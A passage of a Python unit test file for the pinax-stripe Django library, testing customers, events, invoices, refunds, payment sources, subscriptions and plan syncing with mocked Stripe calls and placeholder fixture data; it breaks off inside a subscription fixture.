event = Event.objects.create(stripe_id="evt_1", validated_message=message, kind="customer.created", stripe_account=account)
customers.link_customer(event)
Customer.objects.get(stripe_id="cu_123", stripe_account=account)
self.assertTrue(SyncMock.called)
class CustomersWithConnectTests(TestCase):
def setUp(self):
self.User = get_user_model()
self.user = self.User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
self.plan = Plan.objects.create(
stripe_id="p1",
amount=10,
currency="usd",
interval="monthly",
interval_count=1,
name="Pro"
)
self.account = Account.objects.create(
stripe_id="acc_XXX"
)
def test_get_customer_for_user_with_stripe_account(self):
expected = Customer.objects.create(
stripe_id="x",
stripe_account=self.account)
UserAccount.objects.create(user=self.user, account=self.account, customer=expected)
actual = customers.get_customer_for_user(
self.user, stripe_account=self.account)
self.assertEquals(expected, actual)
def test_get_customer_for_user_with_stripe_account_and_legacy_customer(self):
Customer.objects.create(user=self.user, stripe_id="x")
self.assertIsNone(customers.get_customer_for_user(
self.user, stripe_account=self.account))
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.create")
def test_customer_create_with_connect(self, CreateMock, SyncMock):
CreateMock.return_value = dict(id="cus_XXXXX")
customer = customers.create(self.user, stripe_account=self.account)
self.assertIsNone(customer.user)
self.assertEqual(customer.stripe_id, "cus_XXXXX")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertEqual(kwargs["stripe_account"], self.account.stripe_id)
self.assertIsNone(kwargs["source"])
self.assertIsNone(kwargs["plan"])
self.assertIsNone(kwargs["trial_end"])
self.assertTrue(SyncMock.called)
@patch("stripe.Customer.retrieve")
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.create")
def test_customer_create_with_connect_and_stale_user_account(self, CreateMock, SyncMock, RetrieveMock):
CreateMock.return_value = dict(id="cus_XXXXX")
RetrieveMock.side_effect = stripe.error.InvalidRequestError(
message="Not Found", param="stripe_id"
)
ua = UserAccount.objects.create(
user=self.user,
account=self.account,
customer=Customer.objects.create(stripe_id="cus_Z", stripe_account=self.account))
customer = customers.create(self.user, stripe_account=self.account)
self.assertIsNone(customer.user)
self.assertEqual(customer.stripe_id, "cus_XXXXX")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertEqual(kwargs["stripe_account"], self.account.stripe_id)
self.assertIsNone(kwargs["source"])
self.assertIsNone(kwargs["plan"])
self.assertIsNone(kwargs["trial_end"])
self.assertTrue(SyncMock.called)
self.assertEqual(self.user.user_accounts.get(), ua)
self.assertEqual(ua.customer, customer)
RetrieveMock.assert_called_once_with("cus_Z", stripe_account=self.account.stripe_id)
@patch("stripe.Customer.retrieve")
def test_customer_create_with_connect_with_existing_customer(self, RetrieveMock):
expected = Customer.objects.create(
stripe_id="x",
stripe_account=self.account)
UserAccount.objects.create(user=self.user, account=self.account, customer=expected)
customer = customers.create(self.user, stripe_account=self.account)
self.assertEquals(customer, expected)
RetrieveMock.assert_called_once_with("x", stripe_account=self.account.stripe_id)
@patch("pinax.stripe.actions.invoices.create_and_pay")
@patch("pinax.stripe.actions.customers.sync_customer")
@patch("stripe.Customer.create")
def test_customer_create_user_with_plan(self, CreateMock, SyncMock, CreateAndPayMock):
Plan.objects.create(
stripe_id="pro-monthly",
name="Pro ($19.99/month)",
amount=19.99,
interval="monthly",
interval_count=1,
currency="usd"
)
CreateMock.return_value = dict(id="cus_YYYYYYYYYYYYY")
customer = customers.create(self.user, card="token232323", plan=self.plan, stripe_account=self.account)
self.assertEqual(customer.stripe_id, "cus_YYYYYYYYYYYYY")
_, kwargs = CreateMock.call_args
self.assertEqual(kwargs["email"], self.user.email)
self.assertEqual(kwargs["source"], "token232323")
self.assertEqual(kwargs["plan"], self.plan)
self.assertIsNotNone(kwargs["trial_end"])
self.assertTrue(SyncMock.called)
self.assertTrue(CreateAndPayMock.called)
class EventsTests(TestCase):
@classmethod
def setUpClass(cls):
super(EventsTests, cls).setUpClass()
cls.account = Account.objects.create(stripe_id="acc_001")
def test_dupe_event_exists(self):
Event.objects.create(stripe_id="evt_003", kind="foo", livemode=True, webhook_message="{}", api_version="", request="", pending_webhooks=0)
self.assertTrue(events.dupe_event_exists("evt_003"))
@patch("pinax.stripe.webhooks.AccountUpdatedWebhook.process")
def test_add_event(self, ProcessMock):
events.add_event(stripe_id="evt_001", kind="account.updated", livemode=True, message={})
event = Event.objects.get(stripe_id="evt_001")
self.assertEquals(event.kind, "account.updated")
self.assertTrue(ProcessMock.called)
@patch("pinax.stripe.webhooks.AccountUpdatedWebhook.process")
def test_add_event_connect(self, ProcessMock):
events.add_event(stripe_id="evt_001", kind="account.updated", livemode=True, message={"account": self.account.stripe_id})
event = Event.objects.get(stripe_id="evt_001", stripe_account=self.account)
self.assertEquals(event.kind, "account.updated")
self.assertTrue(ProcessMock.called)
@patch("pinax.stripe.webhooks.AccountUpdatedWebhook.process")
def test_add_event_missing_account_connect(self, ProcessMock):
events.add_event(stripe_id="evt_001", kind="account.updated", livemode=True, message={"account": "acc_NEW"})
event = Event.objects.get(stripe_id="evt_001", stripe_account=Account.objects.get(stripe_id="acc_NEW"))
self.assertEquals(event.kind, "account.updated")
self.assertTrue(ProcessMock.called)
def test_add_event_new_webhook_kind(self):
events.add_event(stripe_id="evt_002", kind="patrick.got.coffee", livemode=True, message={})
event = Event.objects.get(stripe_id="evt_002")
self.assertEquals(event.processed, False)
self.assertIsNone(event.validated_message)
class InvoicesTests(TestCase):
@patch("stripe.Invoice.create")
def test_create(self, CreateMock):
invoices.create(Mock())
self.assertTrue(CreateMock.called)
@patch("pinax.stripe.actions.invoices.sync_invoice_from_stripe_data")
def test_pay(self, SyncMock):
invoice = Mock()
invoice.paid = False
invoice.closed = False
self.assertTrue(invoices.pay(invoice))
self.assertTrue(invoice.stripe_invoice.pay.called)
self.assertTrue(SyncMock.called)
def test_pay_invoice_paid(self):
invoice = Mock()
invoice.paid = True
invoice.closed = False
self.assertFalse(invoices.pay(invoice))
self.assertFalse(invoice.stripe_invoice.pay.called)
def test_pay_invoice_closed(self):
invoice = Mock()
invoice.paid = False
invoice.closed = True
self.assertFalse(invoices.pay(invoice))
self.assertFalse(invoice.stripe_invoice.pay.called)
@patch("stripe.Invoice.create")
def test_create_and_pay(self, CreateMock):
invoice = CreateMock()
invoice.amount_due = 100
self.assertTrue(invoices.create_and_pay(Mock()))
self.assertTrue(invoice.pay.called)
@patch("stripe.Invoice.create")
def test_create_and_pay_amount_due_0(self, CreateMock):
invoice = CreateMock()
invoice.amount_due = 0
self.assertTrue(invoices.create_and_pay(Mock()))
self.assertFalse(invoice.pay.called)
@patch("stripe.Invoice.create")
def test_create_and_pay_invalid_request_error(self, CreateMock):
invoice = CreateMock()
invoice.amount_due = 100
invoice.pay.side_effect = stripe.error.InvalidRequestError("Bad", "error")
self.assertFalse(invoices.create_and_pay(Mock()))
self.assertTrue(invoice.pay.called)
@patch("stripe.Invoice.create")
def test_create_and_pay_invalid_request_error_on_create(self, CreateMock):
CreateMock.side_effect = stripe.error.InvalidRequestError("Bad", "error")
self.assertFalse(invoices.create_and_pay(Mock()))
class RefundsTests(TestCase):
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Refund.create")
def test_create_amount_none(self, RefundMock, SyncMock):
refunds.create(Mock())
self.assertTrue(RefundMock.called)
_, kwargs = RefundMock.call_args
self.assertFalse("amount" in kwargs)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.charges.calculate_refund_amount")
@patch("pinax.stripe.actions.charges.sync_charge_from_stripe_data")
@patch("stripe.Refund.create")
def test_create_with_amount(self, RefundMock, SyncMock, CalcMock):
ChargeMock = Mock()
CalcMock.return_value = decimal.Decimal("10")
refunds.create(ChargeMock, amount=decimal.Decimal("10"))
self.assertTrue(RefundMock.called)
_, kwargs = RefundMock.call_args
self.assertTrue("amount" in kwargs)
self.assertEquals(kwargs["amount"], 1000)
self.assertTrue(SyncMock.called)
class SourcesTests(TestCase):
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_create_card(self, SyncMock):
CustomerMock = Mock()
result = sources.create_card(CustomerMock, token="token")
self.assertTrue(result is not None)
self.assertTrue(CustomerMock.stripe_customer.sources.create.called)
_, kwargs = CustomerMock.stripe_customer.sources.create.call_args
self.assertEquals(kwargs["source"], "token")
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_update_card(self, SyncMock):
CustomerMock = Mock()
SourceMock = CustomerMock.stripe_customer.sources.retrieve()
result = sources.update_card(CustomerMock, "")
self.assertTrue(result is not None)
self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
self.assertTrue(SourceMock.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_update_card_name_not_none(self, SyncMock):
CustomerMock = Mock()
SourceMock = CustomerMock.stripe_customer.sources.retrieve()
sources.update_card(CustomerMock, "", name="My Visa")
self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
self.assertTrue(SourceMock.save.called)
self.assertEquals(SourceMock.name, "My Visa")
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_update_card_exp_month_not_none(self, SyncMock):
CustomerMock = Mock()
SourceMock = CustomerMock.stripe_customer.sources.retrieve()
sources.update_card(CustomerMock, "", exp_month="My Visa")
self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
self.assertTrue(SourceMock.save.called)
self.assertEquals(SourceMock.exp_month, "My Visa")
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.sources.sync_payment_source_from_stripe_data")
def test_update_card_exp_year_not_none(self, SyncMock):
CustomerMock = Mock()
SourceMock = CustomerMock.stripe_customer.sources.retrieve()
sources.update_card(CustomerMock, "", exp_year="My Visa")
self.assertTrue(CustomerMock.stripe_customer.sources.retrieve.called)
self.assertTrue(SourceMock.save.called)
self.assertEquals(SourceMock.exp_year, "My Visa")
self.assertTrue(SyncMock.called)
@skipIf(django.VERSION < (1, 9), "Only for django 1.9+")
def test_delete_card_dj19(self):
CustomerMock = Mock()
result = sources.delete_card(CustomerMock, source="card_token")
self.assertEqual(result, (0, {"pinax_stripe.Card": 0}))
self.assertTrue(CustomerMock.stripe_customer.sources.retrieve().delete.called)
@skipIf(django.VERSION >= (1, 9), "Only for django before 1.9")
def test_delete_card(self):
CustomerMock = Mock()
result = sources.delete_card(CustomerMock, source="card_token")
self.assertTrue(result is None)
self.assertTrue(CustomerMock.stripe_customer.sources.retrieve().delete.called)
def test_delete_card_object(self):
User = get_user_model()
user = User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
customer = Customer.objects.create(
user=user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
card = Card.objects.create(
customer=customer,
stripe_id="card_stripe",
address_line_1_check="check",
address_zip_check="check",
country="us",
cvc_check="check",
exp_month=1,
exp_year=2000,
funding="funding",
fingerprint="fingerprint"
)
pk = card.pk
sources.delete_card_object("card_stripe")
self.assertFalse(Card.objects.filter(pk=pk).exists())
def test_delete_card_object_not_card(self):
User = get_user_model()
user = User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
customer = Customer.objects.create(
user=user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
card = Card.objects.create(
customer=customer,
stripe_id="bitcoin_stripe",
address_line_1_check="check",
address_zip_check="check",
country="us",
cvc_check="check",
exp_month=1,
exp_year=2000,
funding="funding",
fingerprint="fingerprint"
)
pk = card.pk
sources.delete_card_object("bitcoin_stripe")
self.assertTrue(Card.objects.filter(pk=pk).exists())
class SubscriptionsTests(TestCase):
@classmethod
def setUpClass(cls):
super(SubscriptionsTests, cls).setUpClass()
cls.User = get_user_model()
cls.user = cls.User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
cls.customer = Customer.objects.create(
user=cls.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
cls.plan = Plan.objects.create(
stripe_id="the-plan",
amount=2,
interval_count=1,
)
cls.account = Account.objects.create(stripe_id="acct_xx")
cls.connected_customer = Customer.objects.create(
stripe_id="cus_yyyyyyyyyyyyyyy",
stripe_account=cls.account,
)
UserAccount.objects.create(user=cls.user,
customer=cls.connected_customer,
account=cls.account)
def test_has_active_subscription(self):
plan = Plan.objects.create(
amount=10,
currency="usd",
interval="monthly",
interval_count=1,
name="Pro"
)
Subscription.objects.create(
customer=self.customer,
plan=plan,
quantity=1,
start=timezone.now(),
status="active",
cancel_at_period_end=False
)
self.assertTrue(subscriptions.has_active_subscription(self.customer))
def test_has_active_subscription_False_no_subscription(self):
self.assertFalse(subscriptions.has_active_subscription(self.customer))
def test_has_active_subscription_False_expired(self):
plan = Plan.objects.create(
amount=10,
currency="usd",
interval="monthly",
interval_count=1,
name="Pro"
)
Subscription.objects.create(
customer=self.customer,
plan=plan,
quantity=1,
start=timezone.now(),
status="active",
cancel_at_period_end=False,
ended_at=timezone.now() - datetime.timedelta(days=3)
)
self.assertFalse(subscriptions.has_active_subscription(self.customer))
def test_has_active_subscription_ended_but_not_expired(self):
plan = Plan.objects.create(
amount=10,
currency="usd",
interval="monthly",
interval_count=1,
name="Pro"
)
Subscription.objects.create(
customer=self.customer,
plan=plan,
quantity=1,
start=timezone.now(),
status="active",
cancel_at_period_end=False,
ended_at=timezone.now() + datetime.timedelta(days=3)
)
self.assertTrue(subscriptions.has_active_subscription(self.customer))
@patch("stripe.Subscription")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_cancel_subscription(self, SyncMock, StripeSubMock):
subscription = Subscription(stripe_id="sub_X", customer=self.customer)
obj = object()
SyncMock.return_value = obj
sub = subscriptions.cancel(subscription)
self.assertIs(sub, obj)
self.assertTrue(SyncMock.called)
_, kwargs = StripeSubMock.call_args
self.assertEquals(kwargs["stripe_account"], None)
@patch("stripe.Subscription")
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_cancel_subscription_with_account(self, SyncMock, StripeSubMock):
subscription = Subscription(stripe_id="sub_X", customer=self.connected_customer)
subscriptions.cancel(subscription)
_, kwargs = StripeSubMock.call_args
self.assertEquals(kwargs["stripe_account"], self.account.stripe_id)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update(self, SyncMock):
SubMock = Mock()
SubMock.customer = self.customer
obj = object()
SyncMock.return_value = obj
sub = subscriptions.update(SubMock)
self.assertIs(sub, obj)
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update_plan(self, SyncMock):
SubMock = Mock()
SubMock.customer = self.customer
subscriptions.update(SubMock, plan="test_value")
self.assertEquals(SubMock.stripe_subscription.plan, "test_value")
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update_plan_quantity(self, SyncMock):
SubMock = Mock()
SubMock.customer = self.customer
subscriptions.update(SubMock, quantity="test_value")
self.assertEquals(SubMock.stripe_subscription.quantity, "test_value")
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update_plan_prorate(self, SyncMock):
SubMock = Mock()
SubMock.customer = self.customer
subscriptions.update(SubMock, prorate=False)
self.assertEquals(SubMock.stripe_subscription.prorate, False)
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update_plan_coupon(self, SyncMock):
SubMock = Mock()
SubMock.customer = self.customer
subscriptions.update(SubMock, coupon="test_value")
self.assertEquals(SubMock.stripe_subscription.coupon, "test_value")
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update_plan_charge_now(self, SyncMock):
SubMock = Mock()
SubMock.customer = self.customer
SubMock.stripe_subscription.trial_end = time.time() + 1000000.0
subscriptions.update(SubMock, charge_immediately=True)
self.assertEquals(SubMock.stripe_subscription.trial_end, "now")
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
def test_update_plan_charge_now_old_trial(self, SyncMock):
trial_end = time.time() - 1000000.0
SubMock = Mock()
SubMock.customer = self.customer
SubMock.stripe_subscription.trial_end = trial_end
subscriptions.update(SubMock, charge_immediately=True)
# Trial end date hasn't changed
self.assertEquals(SubMock.stripe_subscription.trial_end, trial_end)
self.assertTrue(SubMock.stripe_subscription.save.called)
self.assertTrue(SyncMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("stripe.Subscription.create")
def test_subscription_create(self, SubscriptionCreateMock, SyncMock):
subscriptions.create(self.customer, "the-plan")
self.assertTrue(SyncMock.called)
self.assertTrue(SubscriptionCreateMock.called)
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("stripe.Subscription.create")
def test_subscription_create_with_trial(self, SubscriptionCreateMock, SyncMock):
subscriptions.create(self.customer, "the-plan", trial_days=3)
self.assertTrue(SubscriptionCreateMock.called)
_, kwargs = SubscriptionCreateMock.call_args
self.assertEquals(kwargs["trial_end"].date(), (datetime.datetime.utcnow() + datetime.timedelta(days=3)).date())
@patch("pinax.stripe.actions.subscriptions.sync_subscription_from_stripe_data")
@patch("stripe.Subscription.create")
def test_subscription_create_token(self, SubscriptionCreateMock, CustomerMock):
subscriptions.create(self.customer, "the-plan", token="token")
self.assertTrue(SubscriptionCreateMock.called)
_, kwargs = SubscriptionCreateMock.call_args
self.assertEquals(kwargs["source"], "token")
@patch("stripe.Subscription.create")
def test_subscription_create_with_connect(self, SubscriptionCreateMock):
SubscriptionCreateMock.return_value = {
"object": "subscription",
"id": "sub_XX",
"application_fee_percent": None,
"cancel_at_period_end": False,
"canceled_at": None,
"current_period_start": 1509978774,
"current_period_end": 1512570774,
"ended_at": None,
"quantity": 1,
"start": 1509978774,
"status": "active",
"trial_start": None,
"trial_end": None,
"plan": {
"id": self.plan.stripe_id,
}}
subscriptions.create(self.connected_customer, self.plan.stripe_id)
SubscriptionCreateMock.assert_called_once_with(
coupon=None,
customer=self.connected_customer.stripe_id,
plan="the-plan",
quantity=4,
stripe_account="acct_xx",
tax_percent=None)
subscription = Subscription.objects.get()
self.assertEqual(subscription.customer, self.connected_customer)
@patch("stripe.Subscription.retrieve")
@patch("stripe.Subscription.create")
def test_retrieve_subscription_with_connect(self, CreateMock, RetrieveMock):
CreateMock.return_value = {
"object": "subscription",
"id": "sub_XX",
"application_fee_percent": None,
"cancel_at_period_end": False,
"canceled_at": None,
"current_period_start": 1509978774,
"current_period_end": 1512570774,
"ended_at": None,
"quantity": 1,
"start": 1509978774,
"status": "active",
"trial_start": None,
"trial_end": None,
"plan": {
"id": self.plan.stripe_id,
}}
subscriptions.create(self.connected_customer, self.plan.stripe_id)
subscriptions.retrieve(self.connected_customer, "sub_XX")
RetrieveMock.assert_called_once_with("sub_XX", stripe_account=self.account.stripe_id)
def test_is_period_current(self):
sub = Subscription(current_period_end=(timezone.now() + datetime.timedelta(days=2)))
self.assertTrue(subscriptions.is_period_current(sub))
def test_is_period_current_false(self):
sub = Subscription(current_period_end=(timezone.now() - datetime.timedelta(days=2)))
self.assertFalse(subscriptions.is_period_current(sub))
def test_is_status_current(self):
sub = Subscription(status="trialing")
self.assertTrue(subscriptions.is_status_current(sub))
def test_is_status_current_false(self):
sub = Subscription(status="canceled")
self.assertFalse(subscriptions.is_status_current(sub))
def test_is_valid(self):
sub = Subscription(status="trialing")
self.assertTrue(subscriptions.is_valid(sub))
def test_is_valid_false(self):
sub = Subscription(status="canceled")
self.assertFalse(subscriptions.is_valid(sub))
def test_is_valid_false_canceled(self):
sub = Subscription(status="trialing", cancel_at_period_end=True, current_period_end=(timezone.now() - datetime.timedelta(days=2)))
self.assertFalse(subscriptions.is_valid(sub))
class SyncsTests(TestCase):
def setUp(self):
self.User = get_user_model()
self.user = self.User.objects.create_user(
username="patrick",
email="paltman@example.com"
)
self.customer = Customer.objects.create(
user=self.user,
stripe_id="cus_xxxxxxxxxxxxxxx"
)
def test_sync_coupon_from_stripe_data(self):
account = Account.objects.create(
stripe_id="acct_X",
type="standard",
)
coupon = {
"id": "35OFF",
"object": "coupon",
"amount_off": None,
"created": 1391694467,
"currency": None,
"duration": "repeating",
"duration_in_months": 3,
"livemode": True,
"max_redemptions": None,
"metadata": {
},
"percent_off": 35,
"redeem_by": None,
"times_redeemed": 1,
"valid": True
}
cs1 = coupons.sync_coupon_from_stripe_data(coupon)
self.assertTrue(cs1.livemode)
c1 = Coupon.objects.get(stripe_id=coupon["id"], stripe_account=None)
self.assertEquals(c1, cs1)
self.assertEquals(c1.percent_off, decimal.Decimal(35.00))
cs2 = coupons.sync_coupon_from_stripe_data(coupon, stripe_account=account)
c2 = Coupon.objects.get(stripe_id=coupon["id"], stripe_account=account)
self.assertEquals(c2, cs2)
self.assertEquals(c2.percent_off, decimal.Decimal(35.00))
self.assertFalse(c1 == c2)
@patch("stripe.Plan.auto_paging_iter", create=True)
def test_sync_plans(self, PlanAutoPagerMock):
PlanAutoPagerMock.return_value = [
{
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
{
"id": "simple1",
"object": "plan",
"amount": 999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {},
"name": "The Simple Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
]
plans.sync_plans()
self.assertTrue(Plan.objects.all().count(), 2)
self.assertEquals(Plan.objects.get(stripe_id="simple1").amount, decimal.Decimal("9.99"))
@patch("stripe.Plan.auto_paging_iter", create=True)
def test_sync_plans_update(self, PlanAutoPagerMock):
PlanAutoPagerMock.return_value = [
{
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {},
"name": "The Pro Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
{
"id": "simple1",
"object": "plan",
"amount": 999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {},
"name": "The Simple Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
},
]
plans.sync_plans()
self.assertTrue(Plan.objects.all().count(), 2)
self.assertEquals(Plan.objects.get(stripe_id="simple1").amount, decimal.Decimal("9.99"))
PlanAutoPagerMock.return_value[1].update({"amount": 499})
plans.sync_plans()
self.assertEquals(Plan.objects.get(stripe_id="simple1").amount, decimal.Decimal("4.99"))
def test_sync_plan(self):
"""
Test that a single Plan is updated
"""
Plan.objects.create(
stripe_id="pro2",
name="Plan Plan",
interval="month",
interval_count=1,
amount=decimal.Decimal("19.99")
)
plan = {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
"metadata": {},
"name": "Gold Plan",
"statement_descriptor": "ALTMAN",
"trial_period_days": 3
}
plans.sync_plan(plan)
self.assertTrue(Plan.objects.all().count(), 1)
self.assertEquals(Plan.objects.get(stripe_id="pro2").name, plan["name"])
def test_sync_payment_source_from_stripe_data_card(self):
source = {
"id": "card_17AMEBI10iPhvocM1LnJ0dBc",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "MasterCard",
"country": "US",
"customer": "cus_7PAYYALEwPuDJE",
"cvc_check": "pass",
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2018,
"funding": "credit",
"last4": "4444",
"metadata": {
},
"name": None,
"tokenization_method": None,
"fingerprint": "xyz"
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(Card.objects.get(stripe_id=source["id"]).exp_year, 2018)
def test_sync_payment_source_from_stripe_data_card_blank_cvc_check(self):
source = {
"id": "card_17AMEBI10iPhvocM1LnJ0dBc",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "MasterCard",
"country": "US",
"customer": "cus_7PAYYALEwPuDJE",
"cvc_check": None,
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2018,
"funding": "credit",
"last4": "4444",
"metadata": {
},
"name": None,
"tokenization_method": None,
"fingerprint": "xyz"
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(Card.objects.get(stripe_id=source["id"]).cvc_check, "")
def test_sync_payment_source_from_stripe_data_card_blank_country(self):
source = {
"id": "card_17AMEBI10iPhvocM1LnJ0dBc",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "MasterCard",
"country": None,
"customer": "cus_7PAYYALEwPuDJE",
"cvc_check": "pass",
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2018,
"funding": "credit",
"last4": "4444",
"metadata": {
},
"name": None,
"tokenization_method": None,
"fingerprint": "xyz"
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(Card.objects.get(stripe_id=source["id"]).country, "")
def test_sync_payment_source_from_stripe_data_card_updated(self):
source = {
"id": "card_17AMEBI10iPhvocM1LnJ0dBc",
"object": "card",
"address_city": None,
"address_country": None,
"address_line1": None,
"address_line1_check": None,
"address_line2": None,
"address_state": None,
"address_zip": None,
"address_zip_check": None,
"brand": "MasterCard",
"country": "US",
"customer": "cus_7PAYYALEwPuDJE",
"cvc_check": "pass",
"dynamic_last4": None,
"exp_month": 10,
"exp_year": 2018,
"funding": "credit",
"last4": "4444",
"metadata": {
},
"name": None,
"tokenization_method": None,
"fingerprint": "xyz"
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(Card.objects.get(stripe_id=source["id"]).exp_year, 2018)
source.update({"exp_year": 2022})
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(Card.objects.get(stripe_id=source["id"]).exp_year, 2022)
def test_sync_payment_source_from_stripe_data_source_card(self):
source = {
"id": "src_123",
"object": "source",
"amount": None,
"client_secret": "src_client_secret_123",
"created": 1483575790,
"currency": None,
"flow": "none",
"livemode": False,
"metadata": {},
"owner": {
"address": None,
"email": None,
"name": None,
"phone": None,
"verified_address": None,
"verified_email": None,
"verified_name": None,
"verified_phone": None,
},
"status": "chargeable",
"type": "card",
"usage": "reusable",
"card": {
"brand": "Visa",
"country": "US",
"exp_month": 12,
"exp_year": 2034,
"funding": "debit",
"last4": "5556",
"three_d_secure": "not_supported"
}
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertFalse(Card.objects.exists())
def test_sync_payment_source_from_stripe_data_bitcoin(self):
source = {
"id": "btcrcv_17BE32I10iPhvocMqViUU1w4",
"object": "bitcoin_receiver",
"active": False,
"amount": 100,
"amount_received": 0,
"bitcoin_amount": 1757908,
"bitcoin_amount_received": 0,
"bitcoin_uri": "bitcoin:test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1?amount=0.01757908",
"created": 1448499344,
"currency": "usd",
"description": "Receiver for John Doe",
"email": "test@example.com",
"filled": False,
"inbound_address": "test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1",
"livemode": False,
"metadata": {
},
"refund_address": None,
"uncaptured_funds": False,
"used_for_payment": False
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(BitcoinReceiver.objects.get(stripe_id=source["id"]).bitcoin_amount, 1757908)
def test_sync_payment_source_from_stripe_data_bitcoin_updated(self):
source = {
"id": "btcrcv_17BE32I10iPhvocMqViUU1w4",
"object": "bitcoin_receiver",
"active": False,
"amount": 100,
"amount_received": 0,
"bitcoin_amount": 1757908,
"bitcoin_amount_received": 0,
"bitcoin_uri": "bitcoin:test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1?amount=0.01757908",
"created": 1448499344,
"currency": "usd",
"description": "Receiver for John Doe",
"email": "test@example.com",
"filled": False,
"inbound_address": "test_7i9Fo4b5wXcUAuoVBFrc7nc9HDxD1",
"livemode": False,
"metadata": {
},
"refund_address": None,
"uncaptured_funds": False,
"used_for_payment": False
}
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(BitcoinReceiver.objects.get(stripe_id=source["id"]).bitcoin_amount, 1757908)
source.update({"bitcoin_amount": 1886800})
sources.sync_payment_source_from_stripe_data(self.customer, source)
self.assertEquals(BitcoinReceiver.objects.get(stripe_id=source["id"]).bitcoin_amount, 1886800)
def test_sync_subscription_from_stripe_data(self):
Plan.objects.create(stripe_id="pro2", interval="month", interval_count=1, amount=decimal.Decimal("19.99"))
subscription = {
"id": "sub_7Q4BX0HMfqTpN8",
"object": "subscription",
"application_fee_percent": None,
"cancel_at_period_end": False,
"canceled_at": None,
"current_period_end": 1448758544,
"current_period_start": 1448499344,
"customer": self.customer.stripe_id,
"discount": None,
"ended_at": None,
"metadata": {
},
"plan": {
"id": "pro2",
"object": "plan",
"amount": 1999,
"created": 1448121054,
"currency": "usd",
"interval": "month",
"interval_count": 1,
"livemode": False,
